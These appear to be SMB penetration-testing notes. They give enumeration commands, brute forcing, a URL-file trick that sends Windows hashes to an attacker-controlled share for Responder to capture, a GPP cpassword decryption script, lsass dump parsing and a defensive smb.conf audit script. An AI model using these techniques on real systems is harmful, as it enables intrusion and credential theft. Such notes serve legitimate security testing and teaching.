Penetration Testing Notes

Server Message Block


Last updated 11 months ago

Footprinting The Service

Nmap

sudo nmap 10.129.14.128 -sV -sC -p139,445

RPCclient

rpcclient -U "" 10.129.14.128
rpcclient -U'%' 10.10.110.17
Query                     Description
srvinfo                   Server information.
enumdomains               Enumerate all domains that are deployed in the network.
querydominfo              Domain, server, and user information of deployed domains.
netshareenumall           Enumerate all available shares.
netsharegetinfo <share>   Information about a specific share.
enumdomusers              Enumerate all domain users.
queryuser <RID>           Information about a specific user.
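The queries in the table can be run without an interactive rpcclient session by passing them with -c. The script below is an added example and not part of the original notes: it runs the table's queries over a null session, and it parses the "user:[name] rid:[0x...]" lines that enumdomusers prints into decimal RIDs that queryuser accepts. The function names, the target argument and the sample enumdomusers output are mine; the sample is constructed so the parser can be exercised offline.

```shell
#!/bin/sh
# Added example (not from the original notes): non-interactive rpcclient over a
# null session, plus a parser for enumdomusers output.

# rpc_null_enum IP  -> runs the queries from the table above in one rpcclient call
rpc_null_enum() {
    rpcclient -U '' -N "$1" -c 'srvinfo;enumdomains;querydominfo;netshareenumall;enumdomusers'
}

# parse_enumdomusers  -> reads "user:[name] rid:[0x1f4]" lines on stdin,
#                        prints "500 name" (RID converted from hex to decimal)
parse_enumdomusers() {
    sed -n 's/^user:\[\([^]]*\)] rid:\[0x\([0-9a-fA-F]*\)]$/\2 \1/p' \
    | while read -r hexrid name; do
          printf '%d %s\n' "$((0x$hexrid))" "$name"
      done
}

# rpc_query_users IP  -> runs queryuser for every RID the target enumerates
rpc_query_users() {
    rpcclient -U '' -N "$1" -c enumdomusers | parse_enumdomusers | while read -r rid name; do
        printf '=== %s (RID %s) ===\n' "$name" "$rid"
        rpcclient -U '' -N "$1" -c "queryuser $rid"
    done
}

# Constructed sample of what enumdomusers prints (not captured from a real host)
SAMPLE_ENUMDOMUSERS='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[svc_backup] rid:[0x44f]'

# Offline demonstration of the parser; against a live target use:
#   rpc_null_enum 10.129.14.128 ; rpc_query_users 10.129.14.128
printf '%s\n' "$SAMPLE_ENUMDOMUSERS" | parse_enumdomusers
```

The well-known RIDs (500 Administrator, 501 Guest) come straight out of the hex values; anything above 1000 is a domain-created account and is the interesting input for queryuser.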

Search For Known SMB Version Vulnerabilities

Check For Shares Using Null Sessions

smbclient -N -L //$ip/
cme smb $ip --shares -u "guest" -p ""

Brute Forcing

cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'

URL File attacks

Test for URL file attacks when a share is writable and users browse it from Windows Explorer. Create a file called "@somename.url" (the leading @ sorts it to the top of the listing, so Explorer renders it as soon as the folder is opened) with the contents below and upload it to the share. When Explorer tries to load the icon it authenticates to the attacker's SMB server, leaking the browsing user's NetNTLMv2 hash.

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\<attacker-ip>\%USERNAME%.icon
IconIndex=1

Run Responder (or impacket's smbserver) on the attacker side to capture the hashes:

/opt/Responder-3.1.3.0/Responder.py -I tun0

Read / Upload access

Attempt to download and view share contents using valid credentials, anonymous (guest) login, or a null session

smbmap -H $ip
smbmap -H $ip -r 
smbmap -H 10.129.14.128 --download "notes\note.txt"
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
smbmap -u guest -p "" -H $ip -A '.*' -R

Cpassword discovery

Search shares (typically SYSVOL, under Policies\{GUID}\Machine\Preferences\Groups\Groups.xml, and the sibling Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml) for a cpassword attribute. The value is AES-256 encrypted with a key Microsoft published, so it decrypts to clear text:

gpp-decrypt cpassword
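To show what gpp-decrypt actually does, the script below is an added example and not part of the original notes or of the gpp-decrypt tool: it restores the missing base64 padding, decrypts with the published GPP AES-256 key and a zero IV, and decodes the UTF-16LE result, then scrapes every cpassword out of a Groups.xml. The function names and the sample Groups.xml are mine; the cpassword in the sample is the documented gpp-decrypt test vector, not one taken from a real domain. It needs openssl (iconv is used when present).

```shell
#!/bin/sh
# Added example (not from the original notes): a gpp-decrypt equivalent plus a
# Groups.xml scraper. The key is the one Microsoft published for Group Policy
# Preferences (MS14-025); the IV is sixteen zero bytes; plaintext is UTF-16LE.

GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_AES_IV=00000000000000000000000000000000

# gpp_decrypt CPASSWORD  -> prints the clear-text password
gpp_decrypt() {
    cp=$1
    # the attribute is stored without base64 padding, so restore it first
    pad=$(( (4 - ${#cp} % 4) % 4 ))
    while [ "$pad" -gt 0 ]; do cp="${cp}="; pad=$((pad - 1)); done
    printf '%s' "$cp" | openssl base64 -d -A \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | if command -v iconv >/dev/null 2>&1; then
              iconv -f UTF-16LE -t UTF-8
          else
              tr -d '\000'    # good enough for ASCII-only passwords
          fi
}

# gpp_extract FILE  -> prints "userName clear-text-password" for each cpassword in a GPP XML file
gpp_extract() {
    grep -o '<Properties[^>]*cpassword="[^"]*"[^>]*>' "$1" | while IFS= read -r props; do
        user=$(printf '%s' "$props" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
        cpw=$(printf '%s' "$props" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
        [ -n "$cpw" ] || continue                # an empty cpassword means "no password set"
        printf '%s %s\n' "${user:-<no userName>}" "$(gpp_decrypt "$cpw")"
    done
}

# Constructed sample Groups.xml (assumed layout; the cpassword is the documented
# gpp-decrypt test vector, not a value taken from a real domain)
SAMPLE_GROUPS_XML=$(mktemp)
trap 'rm -f "$SAMPLE_GROUPS_XML"' EXIT
cat > "$SAMPLE_GROUPS_XML" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_backup" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="svc_backup"/>
  </User>
</Groups>
EOF

gpp_extract "$SAMPLE_GROUPS_XML"    # prints: svc_backup Local*P4ssword!
```

Against a real share, mount or download SYSVOL and point gpp_extract at every Preferences XML found; the same decryption applies to the cpassword attribute in Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml.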

lsass.zip lsass.dmp

Search shares for lsass.zip or lsass.dmp (a memory dump of the LSASS process). Unzip the archive if needed, then parse the minidump with pypykatz to recover credentials, keys and Kerberos tickets:

pypykatz lsa minidump lsass.dmp

Alternate Data Streams (ADS)

Test for alternate data streams after discovering 0-byte files on a share. From an smbclient session, allinfo lists the file's streams; a stream shown as filename:streamname:$DATA can be retrieved with get filename:streamname.

allinfo filename
get filename:streamname

Check Password Policy

cme smb $ip --pass-pol -u guest -p ""

User Discovery

Check for users using valid credentials, anonymous (guest) login, or a null session

cme smb $ip --users -u guest -p ""
cme smb $ip --rid-brute -u guest -p ""

Group discovery

Check for groups using valid credentials, anonymous (guest) login, or a null session

cme smb $ip --groups -u guest -p ""

Smbclient

Interactively access SMB shares using smbclient (-N suppresses the password prompt; a password is passed inline as user%password, since -p is the port option)

smbclient //$ip/someshare -N
smbclient //$ip/someshare -U 'guest' -N
smbclient //$ip/someshare -U 'validuser%validpass'

Smbmap

The smbmap commands for listing, downloading and uploading share contents are given under Read / Upload access above.

Dangerous Settings

Setting                     Description
browseable = yes            The share is listed when clients browse the server.
read only = no              Files may be created and modified (the inverse of writable).
writable = yes              Users may create and modify files.
guest ok = yes              Connections are allowed without a password (guest/anonymous access).
enable privileges = yes     Privileges assigned to specific SIDs are honored.
create mask = 0777          Permissions applied to newly created files (world-writable here).
directory mask = 0777       Permissions applied to newly created directories (world-writable here).
logon script = script.sh    Script downloaded and run on the client when the user logs on.
magic script = script.sh    File that the server executes as soon as it is closed after being written.
magic output = script.out   File the output of the magic script is written to.
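An added example (not part of the original notes) that turns the table into a check: a small smb.conf audit that flags the listed settings, run against a constructed weak share and its hardened counterpart. It assumes the plain "key = value" syntax of smb.conf and Samba's synonyms public (for guest ok) and writeable (for writable); the function name, the share names and both configuration files are mine.

```shell
#!/bin/sh
# Added example (not from the original notes): flag the dangerous smb.conf
# settings from the table above and show a weak share next to a hardened one.

# audit_smb_conf FILE  -> prints "section: setting = value" for each dangerous setting
audit_smb_conf() {
    awk '
        /^[ \t]*[#;]/ { next }                          # comment lines
        /^[ \t]*\[.*][ \t]*$/ {                         # [section] header
            s = index($0, "["); e = index($0, "]"); sec = substr($0, s + 1, e - s - 1); next
        }
        /=/ {
            eq = index($0, "=")                          # split on the first "=" only
            key = tolower(substr($0, 1, eq - 1)); val = tolower(substr($0, eq + 1))
            gsub(/^[ \t]+|[ \t]+$/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", val)
            bad = 0
            if ((key == "guest ok" || key == "public") && val == "yes") bad = 1
            else if ((key == "writable" || key == "writeable") && val == "yes") bad = 1
            else if (key == "read only" && val == "no") bad = 1
            else if ((key == "create mask" || key == "directory mask") && val ~ /^0?777$/) bad = 1
            else if (key == "enable privileges" && val == "yes") bad = 1
            else if (key == "logon script" || key == "magic script" || key == "magic output") bad = 1
            if (bad) print sec ": " key " = " val
        }' "$1"
}

WEAK_CONF=$(mktemp); HARDENED_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$HARDENED_CONF"' EXIT

# Constructed sample: an anonymous, writable "drop box" share and a netlogon share
cat > "$WEAK_CONF" <<'EOF'
[global]
   workgroup = WORKGROUP
   server string = file server

[public]
   path = /srv/samba/public
   browseable = yes
   guest ok = yes
   writable = yes
   create mask = 0777
   directory mask = 0777

[netlogon]
   path = /srv/samba/netlogon
   read only = no
   logon script = logon.bat
EOF

# The same shares with guest access, write access and world-writable masks removed
cat > "$HARDENED_CONF" <<'EOF'
[global]
   workgroup = WORKGROUP
   server string = file server
   map to guest = Never

[public]
   path = /srv/samba/public
   browseable = yes
   guest ok = no
   read only = yes
   valid users = @staff
   create mask = 0644
   directory mask = 0755

[netlogon]
   path = /srv/samba/netlogon
   read only = yes
   valid users = @staff
EOF

audit_smb_conf "$WEAK_CONF"        # six findings; the hardened file produces none
```

On a real host the same function can be pointed at /etc/samba/smb.conf, or at the output of testparm -s, which expands includes and normalises synonyms before the audit sees them.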

Notes on the flags used above: rpcclient -U'%' explicitly sends an empty username and no password, while -N does not send a username or password and attempts to establish a null session. With smbmap, the -r or -R (recursive) option walks the directories of a share before downloading or uploading.